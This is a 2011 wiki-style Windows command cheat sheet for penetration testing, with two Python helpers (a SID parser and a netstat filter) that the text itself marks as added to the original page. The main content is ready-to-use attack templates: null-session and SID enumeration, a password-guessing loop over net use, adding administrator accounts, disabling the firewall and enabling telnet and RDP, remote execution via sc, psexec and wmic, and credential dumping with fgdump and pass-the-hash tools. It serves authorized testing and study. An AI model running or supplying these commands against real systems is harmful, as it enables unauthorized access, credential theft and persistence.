Windows Commands
Latest revision as of 09:13, 21 January 2011
Recon
nslookup
- Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
nslookup <site>
- Interactive mode:
nslookup
> [name or ip]
> server [server ip]
> set type=any
> ls -d [target_domain] [> filename]
> view [filename]
- No recurse:
> set norecurse
> set recurse
Scanning
tracert
Parameters
- -d -- don't resolve names
- -h <N> -- max number of hops (default 30)
- -j <hostlist> -- use loose source routing
- -w <N> -- wait for Nms before timing out (default 4000)
SMB session
Establishing a null session
net use \\<target> "" /u:""
Establishing an authenticated session
net use \\<target> <password> /u:<username>
Mount a share
net use * \\<target>\<share> <password> /u:<username>
net use * \\<target>\<share> <password> /u:<machinename>\<username>
net use * \\<target>\c$ <password> /u:<username>
Dropping SMB sessions
net use \\<target> /del
Dropping all SMB sessions (bad idea)
net use * /del
Pulling credentials (w/ SMB session)
Pulling credentials
enum -U <target>
enum -G <target>
user2sid
- Outputs in the form S-X-Y-target_sid-RID
user2sid \\<target> <machine_name>
sid2user
- Requires spaces instead of dashes
sid2user \\<target> 5 <target_sid> <N>
for /L %i in (1000, 1, 1050) do @sid2user \\<target> 5 <target_sid> %i
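The two notes above (user2sid prints S-X-Y-target_sid-RID, sid2user wants the same components space-separated with the leading S-1 dropped) are easy to get wrong by hand. This added Python helper, not part of the original page, parses the dash form, rebuilds the argument string sid2user expects, and labels a few well-known RIDs; the SID values and the RID table are constructed for the example.

```python
import re

# Textual SID as printed by user2sid: S-<revision>-<authority>-<sub1>-...-<RID>
SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)$")

# Constructed lookup of a few standard well-known RIDs for labelling output
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest",
                   512: "Domain Admins", 513: "Domain Users"}


def parse_sid(sid: str) -> dict:
    """Split a textual SID into revision, identifier authority, domain
    sub-authorities and the trailing RID; reject anything malformed."""
    m = SID_RE.match(sid.strip())
    if not m:
        raise ValueError(f"not a SID: {sid!r}")
    revision, authority = int(m.group(1)), int(m.group(2))
    subs = [int(x) for x in m.group(3).split("-")[1:]]
    return {"revision": revision, "authority": authority,
            "domain": subs[:-1], "rid": subs[-1]}


def to_sid2user_args(sid: str) -> str:
    """Render the dash form as the space-separated list sid2user takes:
    the revision (S-1) is dropped, then authority, sub-authorities, RID."""
    p = parse_sid(sid)
    parts = [p["authority"], *p["domain"], p["rid"]]
    return " ".join(str(x) for x in parts)


def describe_rid(sid: str) -> str:
    """Label the RID: well-known value, user-created (>= 1000) or built-in."""
    rid = parse_sid(sid)["rid"]
    if rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[rid]
    return "user-created account" if rid >= 1000 else "built-in/unknown"


if __name__ == "__main__":
    # Constructed sample SID, not taken from a real host
    sample = "S-1-5-21-1004336348-1177238915-682003330-512"
    print(to_sid2user_args(sample), "->", describe_rid(sample))
```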
Exploitation
Finding client-side programs
dir /s "c:\Program Files"
dir /s /b "c:\Program Files\*.exe"
Service interaction
List running services
sc query
List all services
sc query state= all
List all service names
sc query state= all | find "SERVICE_NAME"
Query service information
sc query <servicename>
sc qc <servicename>
Start a service
sc config <servicename> start= demand
sc start <servicename>
Starting telnet
sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr
Starting terminal services
sc query termservice
sc config termservice start= demand
sc start termservice
Using sc to invoke an executable
net use \\<target> <password> /u:<username>
sc \\<target> create <name> binpath= <command>
sc \\<target> start <name>
Making that service invoke another executable
sc \\<target> create <name> binpath= "cmd.exe /k <command>"
Variables
Listing environment variables
set
Finding a specific variable
set <variable>
echo %<variable>%
set username
set path
set systemroot
echo %systemroot%
cd %systemroot%
etc.
Users and groups
Listing users
net user
Creating a user
net user <username> <password> /add
Listing groups
net localgroup
Creating a group
net localgroup <groupname> /add
Adding a user to a group
net localgroup <groupname> <username> /add
Adding a user to the telnet users group
net user <username> <password> /add
net localgroup TelnetClients /add
net localgroup TelnetClients <username> /add
Adding a user to the terminal services group
net localgroup "Remote Desktop Users" <username> /add
List administrators
net localgroup administrators
Add an administrator
net user <username> <password> /add
net localgroup administrators <username> /add
Remove a user from a group
net localgroup <group> <username> /del
Delete a user
net user <username> /del
Firewall interaction
Help
netsh /?
Show config
netsh firewall show config
Open a specific port
netsh firewall add portopening protocol = <TCP|UDP> port = <port> name = <comment> scope = custom addresses = <address/CIDR>
Remove the port opening
netsh firewall del portopening protocol = <TCP|UDP> port = <port>
Disable the firewall completely (bad idea)
netsh firewall set opmode disable
Opening the firewall for telnet
netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address>
Opening the firewall for terminal services
netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = <address>
Opening the firewall for SSH
netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = <address>
Registry interaction
Query a key
reg query <keyname>
Adding a key
reg add <keyname> /v <valuename> /t <type> /d <data>
Export data
reg export <keyname> <filename.reg>
Import data
reg import <filename.reg>
Enabling terminal services
reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0
netstat
Finding a port
netstat -an | find "<port>"
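A caveat on the find "<port>" filter above: it matches any line containing those digits, so looking for 445 also returns port 4450 and any address with 445 in it. The added Python below, not part of the original page, shows the substring behaviour next to an exact local-port match; the netstat output is a constructed sample, not a capture from a real host.

```python
import re

# Constructed sample of `netstat -an` output (not captured from a real host)
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4450           0.0.0.0:0              LISTENING
  TCP    10.10.10.5:49160       10.10.10.445:80        ESTABLISHED
  UDP    0.0.0.0:445            *:*
"""

# One connection line: proto, local addr:port, foreign addr, optional state
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$")


def find_substring(output: str, port: int) -> list:
    """What `netstat -an | find "<port>"` does: keep every line containing
    the digits anywhere, including other ports and addresses."""
    return [line for line in output.splitlines() if str(port) in line]


def find_local_port(output: str, port: int, proto: str = None) -> list:
    """Parse each connection line and keep only an exact local-port match,
    optionally restricted to one protocol."""
    hits = []
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header, blank or unparseable line
        p, laddr, lport, faddr, state = m.groups()
        if int(lport) == port and (proto is None or p == proto):
            hits.append({"proto": p, "local": f"{laddr}:{lport}",
                         "foreign": faddr, "state": state or ""})
    return hits


if __name__ == "__main__":
    print("substring matches:", len(find_substring(SAMPLE_NETSTAT, 445)))
    for h in find_local_port(SAMPLE_NETSTAT, 445):
        print(h)
```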
ipconfig
Dump the DNS cache
ipconfig /displaydns
arp
Dump the ARP cache
arp -a
Looping
/L loop
for /L %i in (<start>,<step>,<stop>) do <command>
Counting
for /L %i in (1,1,255) do @echo %i
Ping scanning
for /L %i in (1,1,255) do @echo 10.10.10.%i & @ping -n 5 10.10.10.%i | find "Reply"
DNS bruteforce
for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i
/F loop
for /F ["<options>"] %i in (<stuff>) do <command>
Looping through passwords
for /F %i in (password.lst) do @echo %i & @net use \\<target> %i /u:<username> 2>nul && pause
Portscanning from a file
for /F %i in (ports.txt) do @nc -n -vv -w3 10.10.10.50 %i
psexec
Using psexec (sysinternals)
- -s to run as system
- -c to copy the program to the target first
- -d to run in "detached" mode (no console)
psexec \\<target> -d -u <user> -p <password> <command>
at/schtasks
Starting the scheduler service
net use \\<target> <password> /u:<username>
sc [\\<target>] query schedule
sc [\\<target>] start schedule
Scheduling with at
at [\\<target>] <HH:MM><A|P> <command>
Scheduling with schtasks
schtasks /create /tn <taskname> /s <target> /u <user> /p <password> /sc <frequency> /st <starttime> /sd <startdate> /tr <command>
wmic
Running a program
wmic /node:<target> /user:<username> /password:<password> process call create <command>
List processes
wmic /node:<target> /user:<username> /password:<password> process list brief
wmic /node:<target> /user:<username> /password:<password> process where processid="<pid>" delete
wmic /node:<target> /user:<username> /password:<password> process where name="<name>" delete
Passwords
Account lockout
Info on Windows accounts
net accounts
net accounts /domain
fgdump
Options
- -c -- don't get cached credentials
- -h <target>
- -u <username>
fgdump -c -h <target> -u <username>
Pass-the-hash toolkit (psh-toolkit)
Trend finally noticed/deleted these programs, so I don't have their parameters handy
- whosthere.exe
- genhash.exe
- iam.exe
Helpful hints
ftp
Download a file as anonymous
ftp -A -s:ftp-script.txt <host>
The script
get <file>
bye
An even better script, that grabs everything in the base directory
prompt
mget .
bye